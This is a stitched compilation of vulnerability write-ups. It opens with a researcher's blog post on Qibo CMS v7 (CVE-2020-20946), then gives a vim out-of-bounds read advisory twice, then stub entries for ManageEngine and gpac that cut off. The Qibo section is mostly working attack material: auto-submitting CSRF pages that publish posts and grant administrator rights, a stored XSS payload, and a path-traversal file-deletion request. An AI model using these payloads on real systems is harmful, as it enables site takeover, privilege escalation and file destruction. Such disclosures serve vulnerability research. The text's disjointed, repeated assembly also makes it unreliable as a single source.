    fid=4&postdb%5Btitle%5D=ceshi2&postdb%5Btitlecolor%5D=ceshi&postdb%5Bfonttype%5D=1&postdb%5Bforbidcomment%5D=1&postdb%5Bkeywords%5D=ceshi&select2=&postdb%5Bauthor%5D=&postdb%5Bcopyfrom%5D=&select=&postdb%5Bcopyfromurl%5D=&postdb%5Bpicurl%5D=&postdb%5Bautomakesmall%5D=1&picWidth=300&picHeight=225&postdb%5Bdescription%5D=&postdb%5Byz%5D=1&PageNum=3000&postdb%5Bcontent%5D=1233333323%3Cbr+%2F%3E%0D%0A&Submit=+%E6%8F%90+%E4%BA%A4+&postdb%5Bbak_id%5D=&mid=0&i_id=&aid=0&rid=&only=1&postdb%5Bsmalltitle%5D=&postdb%5Bhtmlname%5D=&postdb%5Btpl%5D%5Bhead%5D=&postdb%5Btpl%5D%5Bfoot%5D=&postdb%5Btpl%5D%5Bbencandy%5D=&postdb%5Bstyle%5D=&postdb%5Bposttime%5D=&postdb%5Bbegintime%5D=&postdb%5Bendtime%5D=&postdb%5Bhits%5D=&postdb%5Bpasswd%5D=&postdb%5Bmoney%5D=&postdb%5Bsubhead%5D=&vote_db%5Bname%5D=&vote_db%5Btype%5D=1&vote_db%5Blimittime%5D=&vote_db%5Blimitip%5D=0&vote_db%5Bforbidguestvote%5D=0&vote_db%5Bbegintime%5D=&vote_db%5Bendtime%5D=&vote_db%5Babout%5D=&vote_db%5Bvotetype%5D=0&textfield=1&hiddenField=0
    

from the request, we can find that there is not a csrf token, besides, the app does not check the referer.Then, we can generate a csrf poc like the one below by burpsuite:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form id="csrf" action="http://localhost:8123/qibo7/member/post.php?job=postnew&step=post" method="POST">
          <input type="hidden" name="fid" value="4" />
          <input type="hidden" name="postdb&#91;title&#93;" value="you have been hacked" />
          <input type="hidden" name="postdb&#91;titlecolor&#93;" value="ceshi" />
          <input type="hidden" name="postdb&#91;fonttype&#93;" value="1" />
          <input type="hidden" name="postdb&#91;forbidcomment&#93;" value="1" />
          <input type="hidden" name="postdb&#91;keywords&#93;" value="ceshi" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="postdb&#91;author&#93;" value="" />
          <input type="hidden" name="postdb&#91;copyfrom&#93;" value="" />
          <input type="hidden" name="select" value="" />
          <input type="hidden" name="postdb&#91;copyfromurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;picurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;automakesmall&#93;" value="1" />
          <input type="hidden" name="picWidth" value="300" />
          <input type="hidden" name="picHeight" value="225" />
          <input type="hidden" name="postdb&#91;description&#93;" value="" />
          <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
          <input type="hidden" name="PageNum" value="3000" />
          <input type="hidden" name="postdb&#91;content&#93;" value="1233333323&lt;br&#32;&#47;&gt;&#13;&#10;" />
          <input type="hidden" name="Submit" value="&#32;æ&#143;&#144;&#32;äº&#164;&#32;" />
          <input type="hidden" name="postdb&#91;bak&#95;id&#93;" value="" />
          <input type="hidden" name="mid" value="0" />
          <input type="hidden" name="i&#95;id" value="" />
          <input type="hidden" name="aid" value="0" />
          <input type="hidden" name="rid" value="" />
          <input type="hidden" name="only" value="1" />
          <input type="hidden" name="postdb&#91;smalltitle&#93;" value="" />
          <input type="hidden" name="postdb&#91;htmlname&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;head&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;foot&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;bencandy&#93;" value="" />
          <input type="hidden" name="postdb&#91;style&#93;" value="" />
          <input type="hidden" name="postdb&#91;posttime&#93;" value="" />
          <input type="hidden" name="postdb&#91;begintime&#93;" value="" />
          <input type="hidden" name="postdb&#91;endtime&#93;" value="" />
          <input type="hidden" name="postdb&#91;hits&#93;" value="" />
          <input type="hidden" name="postdb&#91;passwd&#93;" value="" />
          <input type="hidden" name="postdb&#91;money&#93;" value="" />
          <input type="hidden" name="postdb&#91;subhead&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;name&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;type&#93;" value="1" />
          <input type="hidden" name="vote&#95;db&#91;limittime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;limitip&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;forbidguestvote&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;begintime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;endtime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;about&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;votetype&#93;" value="0" />
          <input type="hidden" name="textfield" value="1" />
          <input type="hidden" name="hiddenField" value="0" />
        </form>
        <script>
            var poc = document.getElementById("csrf");
            poc.submit()
        </script>
      </body>
    </html>
    
    

attacker just need to save the poc as a html and put it on his web server, then send the evil url to another users ,If the user clicks the evil url when logged into the system, he will publish an article(and the article title is defind in the poc) without his knowledge.Now, I will show you the details. I login admin account locally:

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023120247906.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

and I try to request the evil url(http://localhost/test/csrf\_poc1.php), then when we back to the index.php we will find that one more article is published with title “you have been hacked”!

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023120926730.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x02 CSRF to Privilege Escalation (add an super administrator)**

position: /admin/index.php?lfj=member&action=editmember

normal request(change user “axin” to administrator):

    POST /qibo7/admin/index.php?lfj=member&action=editmember HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 633
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=member&job=editmember&uid=2
    Cookie: USR=faol4ey2%096%091571798905%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fregfield.php%3Fjob%3Dreg%26uid%3D2%260.20012388446694007; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Busername%5D=axin&postdb%5Bpassword%5D=5f4dcc3b5aa765d61d8327deb882cf99&postdb%5Bnewpassword%5D=&postdb%5Bgroupid%5D=3&ConfigDB%5Bendtime%5D=&postdb%5Bemail%5D=770284144%40qq.com&postdb%5Bicon%5D=&picWidth=150&picHeight=150&postdb%5Bmoney%5D=5&postdb%5Btotalspace%5D=0&postdb%5Boltime%5D=13226&postdb%5Bsex%5D=0&postdb%5Byz%5D=1&postdb%5Bintroduce%5D=&postdb%5Boicq%5D=&postdb%5Bmsn%5D=&postdb%5Bhomepage%5D=&postdb%5Baddress%5D=&postdb%5Bpostalcode%5D=&postdb%5Btelephone%5D=&postdb%5Bmobphone%5D=&postdb%5Bidcard%5D=&postdb%5Btruename%5D=&email_yz=0&mob_yz=0&idcard_yz=0&Submit=%E4%BF%AE+%E6%94%B9&uid=2&postdb%5Bhits%5D2=2
    

then, we can generate a csrf poc by burpsuite:

    <html>
    
    <body>
    <script>history.pushState('', '', '/')</script>
    <form id="csrf" action="http://localhost:8123/qibo7/admin/index.php?lfj=member&action=editmember" method="POST">
        <input type="hidden" name="postdb&#91;username&#93;" value="axin" />
        <input type="hidden" name="postdb&#91;password&#93;" value="5f4dcc3b5aa765d61d8327deb882cf99" />
        <input type="hidden" name="postdb&#91;newpassword&#93;" value="" />
        <input type="hidden" name="postdb&#91;groupid&#93;" value="3" />
        <input type="hidden" name="ConfigDB&#91;endtime&#93;" value="" />
        <input type="hidden" name="postdb&#91;email&#93;" value="770284144&#64;qq&#46;com" />
        <input type="hidden" name="postdb&#91;icon&#93;" value="" />
        <input type="hidden" name="picWidth" value="150" />
        <input type="hidden" name="picHeight" value="150" />
        <input type="hidden" name="postdb&#91;money&#93;" value="5" />
        <input type="hidden" name="postdb&#91;totalspace&#93;" value="0" />
        <input type="hidden" name="postdb&#91;oltime&#93;" value="13226" />
        <input type="hidden" name="postdb&#91;sex&#93;" value="0" />
        <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
        <input type="hidden" name="postdb&#91;introduce&#93;" value="" />
        <input type="hidden" name="postdb&#91;oicq&#93;" value="" />
        <input type="hidden" name="postdb&#91;msn&#93;" value="" />
        <input type="hidden" name="postdb&#91;homepage&#93;" value="" />
        <input type="hidden" name="postdb&#91;address&#93;" value="" />
        <input type="hidden" name="postdb&#91;postalcode&#93;" value="" />
        <input type="hidden" name="postdb&#91;telephone&#93;" value="" />
        <input type="hidden" name="postdb&#91;mobphone&#93;" value="" />
        <input type="hidden" name="postdb&#91;idcard&#93;" value="" />
        <input type="hidden" name="postdb&#91;truename&#93;" value="" />
        <input type="hidden" name="email&#95;yz" value="0" />
        <input type="hidden" name="mob&#95;yz" value="0" />
        <input type="hidden" name="idcard&#95;yz" value="0" />
        <input type="hidden" name="Submit" value="ä&#191;&#174;&#32;æ&#148;&#185;" />
        <input type="hidden" name="uid" value="2" />
        <input type="hidden" name="postdb&#91;hits&#93;2" value="2" />
        <input type="submit" value="Submit request" />
    </form>
    <script>
        var poc = document.getElementById("csrf");
        poc.submit()
    </script>
    </body>
    </html>
    

the poc is to change user “axin” to administrator, if you want to reproduce the attack, you should register a common user first, and then generate csrf poc yourself.

from the picture below , we can see that the user axin is just a common user.  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023121948917.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

but after the admin click the evil url, the user axin will be admin !!

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023122628335.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x03 Stored XSS in background**

position:/admin/index.php?lfj=friendlink&action=add  
request:

    POST /qibo7/admin/index.php?lfj=friendlink&action=add HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 283
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=friendlink&job=add
    Cookie: USR=faol4ey2%091%091571805064%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dfriendlink%26job%3Dadd; __tins__20133593=%7B%22sid%22%3A%201571802713278%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201571805446751%7D; __51cke__=; __51laig__=47; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Bname%5D=axin&postdb%5Bfid%5D=2&postdb%5Burl%5D=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&postdb%5Blogo%5D=&postdb%5Bdescrip%5D=&postdb%5Bifhide%5D=0&postdb%5Byz%5D=1&postdb%5Biswordlink%5D=0&postdb%5Bendtime%5D=&Submit=%E6%8F%90%E4%BA%A4%E6%95%B0%E6%8D%AE&id=
    

No dangerous characters are escaped， so we can insert our payload like below:  
`"><script>alert(1);</script>`  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123225890.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123328491.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023123459678.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)  
of course, we can also combine the xss with the csrf to do more !

**0x04 Arbitrary File Deletion in background**

position:/admin/index.php?lfj=mysql&action=del

poc:

    POST /qibo7/admin/index.php?lfj=mysql&action=del HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=mysql&job=del
    Cookie: USR=faol4ey2%091%091571799626%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dmysql%26job%3Ddel; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=2%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=V29XS10LbVNSA1EBBgNVBwBXUQQNXQEBVF4GBVNcUlZdXgRQUlxd14a26ee802
    Upgrade-Insecure-Requests: 1
    
    baktime=../test.php&Submit=%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE
    

![在这里插入图片描述](https://img-blog.csdnimg.cn/2019102312471024.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

The problem occurred when the backup database was deleted， we can control the parameter “baktime”, and we can use `../` to achieve directory traversal purpose, so we can delete some web pages.I will show you details next.

firstly, create a file named `axin.php` in the root path of the application like below

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023125214905.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

and then send our payload

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023125423596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

now, the file `axin.php` created just now has been deleted!

![在这里插入图片描述](https://img-blog.csdnimg.cn/2019102312545969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

of course, we can also combine the vul with csrf to do more !

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200708212341789.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70#pic_center)

CVE-2020-20946: some vulnerabilities in qibosoft(齐博CMS整站系统v7)_一个安全研究员-CSDN博客

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build in Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept****Steps to reproduce:**

1.  Clone the repo and build with ASAN.
    
2.  Recreate POC session:
    

    echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4
    

Its content is:

    000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
    au!* 0 n0
    

3.  Load session:

    ./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'
    

Sanitizer output:

    =================================================================
    ==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
    READ of size 4 at 0x6070000003f8 thread T0
        #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
        #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
        #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
        #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
        #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
        #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
        #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
        #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
        #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
        #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
        #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)
    
    0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
    allocated by thread T0 here:
        #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
        #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
      0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
      0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4102472==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

CVE-2021-4166: Out-of-bounds Read in vim

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such `-Z` and `-m`. This bug has been found on default vim build in Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept****Steps to reproduce:**

1.  Clone the repo and build with ASAN.
    
2.  Recreate POC session:
    

    echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4
    

Its content is:

    000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
    au!* 0 n0
    

3.  Load session:

    ./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'
    

Sanitizer output:

    =================================================================
    ==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
    READ of size 4 at 0x6070000003f8 thread T0
        #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
        #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
        #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
        #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
        #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
        #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
        #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
        #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
        #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
        #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
        #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
        #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
        #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)
    
    0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
    allocated by thread T0 here:
        #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
        #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
      0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
      0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==4102472==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

A null pointer dereference vulnerability exists in gpac 1.1.0 in the lsr_read_id.part function, which causes a segmentation fault and application crash.

CVE-2021-45260: Null Pointer Dereference in lsr_read_id.part() · Issue #1979 · gpac/gpac

A null pointer dereference vulnerability exists in gpac 1.1.0 via the lsr_read_anim_values_ex function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

A null pointer dereference was discovered in lsr\_read\_anim\_values\_ex(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --prefix=/root/fuck_bin/gpac/test
